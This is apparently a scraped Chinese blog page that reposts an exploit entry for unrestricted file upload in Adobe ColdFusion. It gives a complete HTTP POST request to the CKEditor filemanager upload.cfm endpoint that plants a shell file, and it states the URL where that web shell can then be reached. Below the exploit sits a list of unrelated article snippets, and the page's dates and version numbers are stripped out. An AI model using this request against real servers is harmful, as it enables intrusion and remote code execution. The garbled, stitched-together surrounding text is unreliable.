# Exploit Title: Unrestricted file upload in Adobe ColdFusion

# Google Dork: ext:cfm

# Date: --

# Exploit Author: Pete Freitag of Foundeo

# Reversed: Vahagn vah_13 Vardanian

# Vendor Homepage: adobe.com

# Version:

# Tested on: Adobe ColdFusion

# CVE : CVE--

# Comment: September , : Updates for ColdFusion  and ColdFusion

 have been elevated to Priority  due to a report that CVE--

is now being actively exploited.

```

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm

HTTP/1.1

Host: coldfusion:port

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,

like Gecko) Chrome/62.0.3202.9 Safari/537.36

Content-Type: multipart/form-data;

boundary=---------------------------

Content-Length:

Connection: close

Upgrade-Insecure-Requests: 

-----------------------------

Content-Disposition: form-data; name="file"; filename="shell_file"

Content-Type: image/jpeg

%shell code here%

-----------------------------

Content-Disposition: form-data; name="path"

shell

-------------------------------

```

a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file

[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload的更多相关文章

  1. FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...

  2. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  3. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server

    CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...

  6. jQuery File Upload done函数没有返回

    最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...

  7. kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

    kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

  8. 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮

    需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...

  9. jquery file upload 文件上传插件

    1. jquery file upload 下载 jquery file upload Demo 地址:https://blueimp.github.io/jQuery-File-Upload/ jq ...

随机推荐

  1. 【python中二叉树的实现】python中二叉树的创建、三种方式递归遍历和非递归遍历

    代码如下: # coding=utf-8 class myNode(object): def __init__(self, data=-1, lchild=None, rchild=None): se ...

  2. 【开发工具】secureCRT的使用

    总结自己平时使用secureCRT中遇到的问题 1.安装 2.secureCRT设置标签显示远程主机ip地址

  3. 654. Maximum Binary Tree 最大节点劈开,然后左边、右边排序

    [抄题]: Given an integer array with no duplicates. A maximum tree building on this array is defined as ...

  4. AppleID的双重认证

    [链接]AppleID的双重认证https://support.apple.com/zh-cn/HT204915

  5. 通过Solr所提供的Dataimporthandler实现数据源的导入

    如需要使用到Solr中的dataimporthandler增量导入功能,则还需要引入两个所依赖的jar包,在上一篇随笔中所提到的下载的Solr项目文件solr-4.10.3\dist目录下可以找到所依 ...

  6. Spring MVC 的 Converter 和 Formatter

    Converter 和 Formatter 都可用于将一种对象类型转换成另一种对象类型. Converter 是通用元件,可以将一种类型转换成另一种类型,可以在应用程序中的任意层中使用: Format ...

  7. Linux mail 查看

    Linux 下查看mail的命令参数: 一般系统收到邮件都会保存在“/var/spool/mail/[linux username]"文件中,在Linux中输入mail,就进入了收件箱,并显 ...

  8. leveldb 学习记录(八) compact

    随着运行时间的增加,memtable会慢慢 转化成 sstable. sstable会越来越多 我们就需要进行整合 compact 代码会在写入查询key值 db写入时等多出位置调用MaybeSche ...

  9. trinitycore 魔兽服务器源码分析(三) 多线程相关

    先看LockedQueue.h template <class T, typename StorageType = std::deque<T> >class LockedQue ...

  10. nginx配置备忘

    一.本地测试环境配置 upstream gongsibao{ server ; server ; #fair; } server { listen ; server_name ubuntu00.xus ...